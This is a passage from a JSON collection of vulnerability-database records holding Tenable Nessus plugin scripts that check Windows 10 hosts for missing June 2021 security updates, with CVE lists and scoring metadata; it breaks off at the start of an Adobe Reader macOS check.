script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003638'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'14393',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003638])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:29:42", "description": "The remote Windows host is missing security update 5003687. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003687: Windows 10 version 1507 LTS Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003687.NASL", "href": "https://www.tenable.com/plugins/nessus/150353", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150353);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003687\");\n script_xref(name:\"MSFT\", value:\"MS21-5003687\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003687: Windows 10 version 1507 LTS Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003687. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003687\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003687\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003687'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'10240',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003687])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:29:42", "description": "The remote Windows host is missing security update 5003646. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003646: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003646.NASL", "href": "https://www.tenable.com/plugins/nessus/150374", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150374);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003646\");\n script_xref(name:\"MSFT\", value:\"MS21-5003646\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003646: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003646. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003646\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003646\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003646'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'17763',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003646])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:10:12", "description": "The remote Windows host is missing security update 5003635. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003635: Windows 10 version 1909 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003635.NASL", "href": "https://www.tenable.com/plugins/nessus/150369", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150369);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33739\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003635\");\n script_xref(name:\"MSFT\", value:\"MS21-5003635\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003635: Windows 10 version 1909 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003635. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003635\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003635\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003635'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build: '18363',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003635])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:29:43", "description": "The remote Windows host is missing security update 5003637. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003637: Windows 10 version 2004 / Windows 10 version 20H2 / Windows 10 version 21H1 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003637.NASL", "href": "https://www.tenable.com/plugins/nessus/150370", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150370);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31960\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33739\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003637\");\n script_xref(name:\"MSFT\", value:\"MS21-5003637\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003637: Windows 10 version 2004 / Windows 10 version 20H2 / Windows 10 version 21H1 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003637. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003637\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003637\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003637'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'19041',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n\n|| smb_check_rollup(os:'10', \n sp:0,\n os_build:'19042',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n\n|| smb_check_rollup(os:'10', \n sp:0,\n os_build:'19043',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003637])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:24", "description": "The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30194, 2020.001.30020, or 2021.001.20149. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability when parsing a crafted jpeg file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2021-21038, CVE-2021-21044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20149 Multiple Vulnerabilities (APSB21-29) (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOS_ADOBE_READER_APSB21-29.NASL", "href": "https://www.tenable.com/plugins/nessus/149378", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149378);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2021-21038\",\n \"CVE-2021-21044\",\n \"CVE-2021-21086\",\n \"CVE-2021-28550\",\n \"CVE-2021-28553\",\n \"CVE-2021-28555\",\n \"CVE-2021-28557\",\n \"CVE-2021-28558\",\n \"CVE-2021-28559\",\n \"CVE-2021-28560\",\n \"CVE-2021-28561\",\n \"CVE-2021-28562\",\n \"CVE-2021-28564\",\n \"CVE-2021-28565\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0229-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30194 / 2020.001.30020 / 2021.001.20149 Multiple Vulnerabilities (APSB21-29) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30194,\n2020.001.30020, or 2021.001.20149. It is, 